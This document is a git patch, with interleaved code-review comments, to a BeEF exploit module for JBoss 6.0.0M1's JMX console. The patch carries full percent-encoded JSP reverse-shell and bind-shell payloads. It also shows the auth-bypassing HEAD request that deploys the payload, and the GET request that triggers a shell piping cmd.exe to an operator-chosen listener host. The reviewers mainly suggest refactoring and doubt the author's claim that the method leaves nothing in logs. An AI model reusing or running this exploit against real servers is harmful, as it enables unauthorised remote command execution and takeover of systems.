From 1dcac350f2b57f906903b5d17c77bc3f87bdb7c7 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Mon, 30 May 2011 10:04:33 +0000 Subject: [PATCH] Fixes issue 337 : added dropdown to let the user choose a reverse or bind payload. Modified JSP payload accordingly. git-svn-id: https://beef.googlecode.com/svn/trunk@990 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- .../jboss_jmx_upload_exploit/command.js | 26 +++++++++++++++---- .../jboss_jmx_upload_exploit/config.yaml | 2 +- .../jboss_jmx_upload_exploit/module.rb | 10 ++++--- 3 files changed, 29 insertions(+), 9 deletions(-) diff --git a/modules/network/jboss_jmx_upload_exploit/command.js b/modules/network/jboss_jmx_upload_exploit/command.js index c09e15b89..43117b3f1 100644 --- a/modules/network/jboss_jmx_upload_exploit/command.js +++ b/modules/network/jboss_jmx_upload_exploit/command.js @@ -1,9 +1,10 @@ /** * Jboss 6.0.0M1 JMX Upload Exploit * Ported from l33tb0y Ruby code in Javascript by antisnatchor. - * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler + * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port * - * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell + * This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell. + * This is the stealthiest approach: nothing is shown on the logs */ beef.execute(function() { 
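Review bot: The added header line `* This is the stealthiest approach: nothing is shown on the logs` claims more than the code supports: the module still sends a HEAD to `/jmx-console/HtmlAdaptor` and a GET to `/web-console/<jspName>.jsp` (the next two hunks), and both are ordinary HTTP requests that a server access log, where one is enabled, will record. Suggest replacing it with a statement the code actually backs, e.g. `* The JSP is written directly instead of deploying a WAR; the two HTTP requests are still visible in server access logs.` The `beef.execute(function() {` callback opened on the last line of this hunk closes outside it.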
@@ -13,9 +14,20 @@ beef.execute(function() { lport = "<%= @lport %>"; injectedCommand = "<%= @injectedCommand %>"; jspName = "<%= @jspName %>"; + payloadType = "<%= @payload %>"; - payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E"; - uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; + reverse = 
"try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20"; + bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20"; + + if(payloadType == "reverse"){ + console.log("Using REVERSE payload [" + reverse + "]"); + payload = 
"%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E"; + }else{ + console.log("Using BIND payload [" + bind + "]"); + payload = 
"%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E"; + } + + uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True"; /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ 
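Review bot: Both branches of the new `if(payloadType == "reverse")` repeat the whole percent-encoded StreamConnector prefix verbatim and differ only in the trailing `reverse`/`bind` fragment, so any later fix to that prefix has to be made twice. Keep the prefix in one variable, e.g. `var jspHead = "%3C%25@page%20import=…%7D%20%7D%20";`, then `payload = jspHead + (payloadType == "reverse" ? reverse : bind) + "%25%3E";`. The new `payloadType`, `reverse` and `bind` follow the pre-existing `lport`/`jspName` pattern of assignment without `var`, which makes them globals on the hooked page; declaring them with `var` keeps them in the callback scope, where `triggerReverseConn` in the next hunk still sees them if it is nested in the same callback as the hunk header suggests. The bare `else` also treats any value other than "reverse" as bind; an explicit `else if(payloadType == "bind")` with a final `beef.net.send(..., "result=ERROR: unknown payload type")` would report a misconfiguration instead of guessing. The enclosing `beef.execute` callback starts and ends outside this hunk.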
@@ -23,7 +35,11 @@ beef.execute(function() { function triggerReverseConn(){ beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ if(response.status_code == "success"){ - beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); + if(payloadType == "reverse"){ + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); + }else{ + beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+"."); + } }else{ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed."); } diff --git a/modules/network/jboss_jmx_upload_exploit/config.yaml b/modules/network/jboss_jmx_upload_exploit/config.yaml index 430bd9e5c..7b51046fa 100644 --- a/modules/network/jboss_jmx_upload_exploit/config.yaml +++ b/modules/network/jboss_jmx_upload_exploit/config.yaml @@ -4,7 +4,7 @@ beef: enable: true category: "Network" name: "Jboss 6.0.0M1 JMX Deploy Exploit" - description: "Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
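Review bot: `triggerReverseConn` now also handles the bind case (the new `else` reports a bind shell), so its name no longer describes what it does; either rename it together with its caller, which sits outside the hunk, or add a comment above the declaration such as `// Second request: GET the deployed JSP. Reverse payload calls back to lhost:lport; bind payload listens on rhost:lport.` The `payloadType == "reverse"` test is now repeated here and in the previous hunk, and the two `beef.net.send` lines differ only in their text; deriving the label once (`var shellKind = payloadType == "reverse" ? "Reverse" : "Bind";`) and sending a single message would remove the duplicated call. The function's body ends outside this hunk.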
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload." + description: "Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload." authors: ["antisnatchor", "l33tb0y"] target: working: ["ALL"] diff --git a/modules/network/jboss_jmx_upload_exploit/module.rb b/modules/network/jboss_jmx_upload_exploit/module.rb index f311cfc27..b99470937 100644 --- a/modules/network/jboss_jmx_upload_exploit/module.rb +++ b/modules/network/jboss_jmx_upload_exploit/module.rb @@ -6,16 +6,20 @@ class Jboss_jmx_upload_exploit < BeEF::Core::Command def initialize super({ 'Name' => 'Jboss 6.0.0M1 JMX Deploy Exploit', - 'Description' => 'Deploy a JSP reverse shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
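Review bot: The rewritten description still says the second GET "triggers the reverse connection to the specified MSF listener", which is no longer accurate for the bind payload that the same sentence introduces; the identical text is duplicated in the `Description` of module.rb in the next hunk, so both should change together. The pre-existing typo `multi/hanlder` is also carried into both new strings and should read `multi/handler`. A clause that matches the code would be `the second request is a GET one that triggers the JSP: a reverse connection to the MSF listener, or a shell bound on lport on the target.`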
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload.', + 'Description' => 'Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.
Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload.', 'Category' => 'Network', 'Author' => 'antisnatchor, l33tb0y', 'Data' => [ {'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'}, {'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'}, {'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'}, - {'name' => 'lport', 'ui_label' => 'MSF Listener Port', 'value' => '6666'}, + {'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'}, {'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'}, - {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)} + {'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)}, + { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', + 'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']], + 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true + } ], 'File' => __FILE__ })
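Review bot: The new `payload` combobox entry has no `'value'`, unlike every other entry in `Data`, so if the combobox honours `'value'` the way the text fields do (not verifiable from this hunk) an operator who never opens the dropdown may submit an empty `@payload`, which command.js's bare `else` then treats as bind. Adding `'value' => 'reverse'` would keep the default consistent with the "MSF Listener Host/Port" labels on the entries above it. The new entry is also formatted differently from its neighbours (spaces inside the braces, split over four lines with unaligned continuations); matching the one-line `{'name' => …}` style of the other entries, or aligning the continuation lines under `'name'`, would keep the list readable. The `'lport'` label `MSF Listener Port (or bind)` is terse; `MSF Listener Port (or bind port)` says what the alternative is. `def initialize` ends outside this hunk.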